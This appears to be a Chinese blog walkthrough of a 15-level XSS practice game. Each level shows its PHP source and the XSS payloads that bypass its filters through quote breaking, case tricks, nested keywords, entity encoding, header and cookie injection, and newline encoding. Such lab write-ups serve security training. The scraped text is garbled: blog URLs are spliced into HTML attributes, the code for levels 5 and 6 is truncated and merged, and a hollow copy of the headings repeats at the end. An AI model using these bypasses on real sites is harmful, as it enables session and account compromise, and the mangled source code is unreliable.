xss小游戲原始碼分析-有解無憂

配置

下載地址:https://files.cnblogs.com/files/Lmg66/xssgame-master.zip
使用:下載解壓，放到www目錄下(phpstudy)，http服務下都行，我使用的是phpstudy

第一關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
window.location.href=https://www.cnblogs.com/Lmg66/p/"level2.php?keyword=跨站師"; 
}
</script>
第1關

<body>
第1關 先熱個身吧
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "歡迎用戶:".$str."";
?>

<?php 
echo "payload的長度:".strlen($str)."";
?>

分析:

對name沒有任何的過濾輸出到標簽中,基本的xss都行

payload:

level1.php?name=<script>alert('xss')</script>

第二關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level3.php?writing=苦盡甘來"; 
}
</script>
第2關

<body>
第2關 窒息的操作
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "沒有找到和".htmlspecialchars($str)."相關的結果.".'<center>
<form action=level2.php method=GET>
<input name=keyword  value=https://www.cnblogs.com/Lmg66/p/"'.$str.'">
<input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/"搜索"/>

';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/688da926-8a0b-452a-9a2b-82ba919328fb.jpg">
<?php 
echo "payload的長度:".strlen($str)."";
?>

分析:

用htmlspecialchars()函式，之前做過，會html物體化，<>會被轉義
可以嘗試"來閉合"

payload:

" onclick=alert('XSS') //
" onclick=alert('XSS') "

第三關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level4.php?keyword=寧靜致遠"; 
}
</script>
第3關

<body>
第3關 這該咋辦啊
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "沒有找到和".htmlspecialchars($str)."相關的結果.
"."



";
?>

<?php 
echo "payload的長度:".strlen($str)."";
?>

分析:

和第二關類似，只是變成了單引號，閉合單引號即可

payload:

' onclick=alert('xss') '
' onclick=alert('xs') //

第四關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level5.php?keyword=逆水行舟"; 
}
</script>
第4關

<body>
第4關 生無可戀
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "沒有找到和".htmlspecialchars($str)."相關的結果.".'<center>
<form action=level4.php method=GET>
<input name=keyword  value=https://www.cnblogs.com/Lmg66/p/"'.$str3.'">
<input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 />

';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/0d3f0d24-a861-4d20-97da-f807ea842be8.jpg">
<?php 
echo "payload的長度:".strlen($str3)."";
?>

分析:

在第二關的基礎上進行了< >的過濾，但第二關payload沒有 < >仍然可以使用

payload:

" onclick=alert('XSS') //
" onclick=alert('XSS') "

第五關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level6.php?keyword=柳暗花明"; 
}
</script>
第5關

<body>
第5關 沒錯又是搜索
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","沒有找到和".htmlspecialchars($str)."相關的結果.".'<center>
<form action=level5.php method=GET>
<input name=keyword  value=https://www.cnblogs.com/Lmg66/p/"'.$str3.'">
<input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 />

';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/cb30e912-eabc-4357-89eb-49e8de1b1961.jpg">
<?php 
echo "payload的長度:".strlen($str3)."";
?>

分析:

strtolower()函式，把字符轉換為小寫，接著替換script標簽和on使這個兩個事件沒法使用，但仍可以閉合引號，所以要使用其他標簽通過javascript:alert('xss')來觸發彈出

payload:

"><a href=javascript:alert('xss') "
"><a href=javascript:alert('xss') //

第六關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level7.php?keyword=持之以恒"; 
}
</script>
第6關

<body>
第6關 嗯 還是搜索
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","沒有找到和".htmlspecialchars($str)."相關的結果.".'<center>
<form action=level6.php method=GET>
<input name=keyword  value=https://www.cnblogs.com/Lmg66/p/"'.$str6.'">
<input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 />

';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/92847238-8dda-473f-9c04-83986de1472a.jpg">
<?php 
echo "payload的長度:".strlen($str6)."";
?>

分析:

替換了script標簽,on,src,data,herf,且html物體化看起來似乎沒問題，但相比前幾關發現沒有轉換為小寫，所以可大小寫來繞過匹配

payload:

" ONclick=alert('XSS') //
"><a Href=javascript:alert('XSS') //

第7關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level8.php?keyword=笨鳥先飛"; 
}
</script>
第7關

<body>
第7關 猜一猜下面題目還有搜索嘛
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "沒有找到和".htmlspecialchars($str)."相關的結果.".'<center>
<form action=level7.php method=GET>
<input name=keyword  value=https://www.cnblogs.com/Lmg66/p/"'.$str6.'">
<input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/搜索 />

';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/17532328-f4cc-4bca-b283-c7f7b5a13f80.jpg" width="20%">
<?php 
echo "payload的長度:".strlen($str6)."";
?>

分析:

get方式傳入keyword，strtolowe()函式變為小寫，然后replace()函式匹配script，on，src，data，href，但是只是匹配了一次，所以可以嵌套繞過，最后htmlspecialchars(),所以< > 不能用，嘗試閉合"

payload:

" oonnclick=alert('XSS') //

第八關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level9.php?keyword=水滴石穿"; 
}
</script>
第8關

<body>
第8關 老鐵要和我換友鏈嘛？
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str).'">
<input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/添加友情鏈接 />

';
?>
<?php
 echo '<center><BR><a href=https://www.cnblogs.com/Lmg66/p/"'.$str7.'">友情鏈接</a></center>';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/d2d2080f-746c-4276-9f63-585fc4fd4a9c.jpg" width="20%">
<?php 
echo "payload的長度:".strlen($str7)."";
?>

分析:

get方式傳入keyword，strtolower()轉換為小寫，然后replace替換script，on，src，data，href，"（"號html物體化了）,然后發現又html物體化輸入，似乎沒有問題，然后發現友情鏈接,沒有html物體化輸入，可以嘗試在這個位置繞過，但是都被過濾了，嘗試編碼繞過對JavaScript;alert('xss')編碼(呸，不是編碼)轉義https://www.jianshu.com/p/6dcefb2a59b2(參考鏈接)，目的是繞過replace，然后仍能被html決議

payload:

javascrip&#x74:alert('xss')
javascrip&#x09t:alert('XSS')

第九關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level10.php?keyword=持之以恒"; 
}
</script>
第9關

<body>
第9關 添加友連again
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str).'">
<input type=submit name=submit value=https://www.cnblogs.com/Lmg66/p/添加友情鏈接 />

';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href=https://www.cnblogs.com/Lmg66/p/"您的鏈接不合法？有沒有！">友情鏈接';
        }
else
{
  echo '<center><BR><a href=https://www.cnblogs.com/Lmg66/p/"'.$str7.'">友情鏈接</a></center>';
}
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/51fb4236-2965-42ab-851e-0ec266b3c3ba.jpg">
<?php 
echo "payload的長度:".strlen($str7)."";
?>

分析:

和第八關相同，只是判斷鏈接是否合法，加上http://就可以了

payload:

javascrip&#x74:alert('xss') //http://

第十關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level11.php?keyword=自強不息"; 
}
</script>
第10關

<body>
第10關 嗯 搜索又出現了
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "沒有找到和".htmlspecialchars($str)."相關的結果.".'<center>
<form id=search>
<input name="t_link"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_history"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_sort"  value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/fed9cb1c-3111-49a8-b111-16081ac4b16c.jpg">
<?php 
echo "payload的長度:".strlen($str)."";
?>

分析:

傳入keyword和t_sort,keyword沒有過濾，但是html物體化輸出，而且沒在標簽內，所以應該沒問題，看t_sort，過濾了< > ,而且沒有物體化輸出
嘗試閉合引號

payload:

?keyword=123&t_sort=" type="text" onclick=alert('XSS') //

第十一關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level12.php?keyword=破釜沉舟"; 
}
</script>
第11關

<body>
第11關 為什么這么多搜索呢
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form id=search>
<input name="t_link"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_history"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_sort"  value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/60a6e17f-c823-40c3-ab84-502b2f905456.jpg">
<?php 
echo "payload的長度:".strlen($str)."";
?>

分析:

str和str00都html物體化而且不在script標簽內部，且閉合為',應該無解，然后發現str33，沒有物體化，$_SERVER['HTTP_REFERER']獲取httpreferer資訊，只是過濾了< > ,可以閉合雙引號來繞過,不過我沒明白這題啥用

payload:

" type = "text" onclick=alert('xss')//

第十二關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level13.php?keyword=矢志不渝"; 
}
</script>
第12關

<body>
第12關 黑人問號
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form id=search>
<input name="t_link"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_history"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_sort"  value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/f4558b8c-778b-4dd8-bef6-425766f9d178.jpg">
<?php 
echo "payload的長度:".strlen($str)."";
?>

分析:

和上一關一樣，xss位置變一下

payload:

" type = "text" onclick=alert('xss')//

第十三關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"level14.php"; 
}
</script>
第13關

<body>
第13關 做題好爽啊
<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "沒有找到和".htmlspecialchars($str)."相關的結果.".'<center>
<form id=search>
<input name="t_link"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_history"  value=https://www.cnblogs.com/Lmg66/p/"'.'" type="hidden">
<input name="t_sort"  value=https://www.cnblogs.com/Lmg66/p/"'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value=https://www.cnblogs.com/Lmg66/p/"'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=https://www.cnblogs.com/Lmg66/p/"https://dn-coding-net-tweet.codehub.cn/photo/2019/c048c2e3-7937-478b-9781-0ee4d7214648.jpg">
<?php 
echo "payload的長度:".strlen($str)."";
?>

分析:

$_COOKIE["user"];獲取cookie，然后過濾< > 沒有物體化輸入，嘗試閉合雙引號

payload:

user=" type = "text" onclick=alert('xss')//

第十四關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script src=https://www.cnblogs.com/Lmg66/p/"https://chao.jsanhuan.cn/angular.min.js"></script>
<script>
window.alert = function()  
{     
confirm("哎喲 不錯哦！");
 window.location.href="level15.php?keyword=業精于勤"; 
}
</script>
第14關

第14關 恭喜你快要通關了

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo'<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

分析:

傳入src，然后物體化輸出，然后似乎無解，仔細看前面ng-include:,
ng-include 指令用于包含外部的 HTML 檔案，包含的內容將作為指定元素的子節點，ng-include 屬性的值可以是一個運算式，回傳一個檔案名，默認情況下，包含的檔案需要包含在同一個域名下，所以傳入其他關的xss，不過不知道這有啥用既然其他地點有xss

payload:

src='https://www.cnblogs.com/Lmg66/p/level1.php?name='

由于參考的js代碼失敗，所以我沒成功，但云靶機是對的，云靶機地址：https://www.xss.tv/

第十五關

查看原始碼:

<!DOCTYPE html>
<head>
<meta charset="utf-8">
<script>
window.alert = function()  
{     
confirm("ORZ ORZ ORZ 恭喜全部通過");
 window.location.href=https://www.cnblogs.com/Lmg66/p/"success.txt"; 
}
</script>
第15關

<body>
第15關 厲害了 Word哥
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace("	"," ",$str4);
echo "".$str5."";
?>

<?php 
echo "payload的長度:".strlen($str5)."";
?>

分析:

get傳入可以word，轉換為小寫，讓過濾script，空格，/，可以使用url編碼來繞過

符號	url編碼
回車	%0d
換行	%0d

payload:

level15.php?keyword=<img%0asrc=https://www.cnblogs.com/Lmg66/p/x%0aonerror=alert('XSS')>

參考文章

國光大佬:https://www.sqlsec.com/2020/01/xss.html
最后歡迎訪問我的博客:https://lmg66.github.io/

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/73466.html

標籤：其他

上一篇：一個unity工程不知道從哪里打開

下一篇：通過安全廠商的設備發現企業存在的安全問題

xss小游戲原始碼分析

配置

第一關

查看原始碼:

第1關 先熱個身吧

歡迎用戶:".$str."

payload的長度:".strlen($str)."

分析:

payload:

第二關

查看原始碼:

第2關 窒息的操作

沒有找到和".htmlspecialchars($str)."相關的結果.

payload的長度:".strlen($str)."

分析:

payload:

第三關

查看原始碼:

第3關 這該咋辦啊

沒有找到和".htmlspecialchars($str)."相關的結果.

payload的長度:".strlen($str)."

分析:

payload:

第四關

查看原始碼:

第4關 生無可戀

沒有找到和".htmlspecialchars($str)."相關的結果.

payload的長度:".strlen($str3)."

分析:

payload:

第五關

查看原始碼:

第5關 沒錯又是搜索

payload的長度:".strlen($str3)."

分析:

payload:

第六關

查看原始碼:

第6關 嗯 還是搜索

payload的長度:".strlen($str6)."

分析:

payload:

第7關

查看原始碼:

第7關 猜一猜下面題目還有搜索嘛

沒有找到和".htmlspecialchars($str)."相關的結果.

payload的長度:".strlen($str6)."

分析:

payload:

第八關

查看原始碼:

第8關 老鐵要和我換友鏈嘛？

payload的長度:".strlen($str7)."

分析:

payload:

第九關

查看原始碼:

第9關 添加友連again

payload的長度:".strlen($str7)."

分析:

payload:

第十關

查看原始碼:

第10關 嗯 搜索又出現了

沒有找到和".htmlspecialchars($str)."相關的結果.

payload的長度:".strlen($str)."

分析:

payload:

第十一關

查看原始碼:

第11關 為什么這么多搜索呢

payload的長度:".strlen($str)."

分析:

payload:

第十二關

查看原始碼:

第12關 黑人問號

payload的長度:".strlen($str)."

分析:

payload:

第1關先熱個身吧

第2關窒息的操作

第3關這該咋辦啊

第4關生無可戀

第5關沒錯又是搜索

第6關嗯還是搜索

第7關猜一猜下面題目還有搜索嘛

第8關老鐵要和我換友鏈嘛？

第9關添加友連again

第10關嗯搜索又出現了

第11關為什么這么多搜索呢

第12關黑人問號

第13關做題好爽啊

第14關恭喜你快要通關了

第15關厲害了 Word哥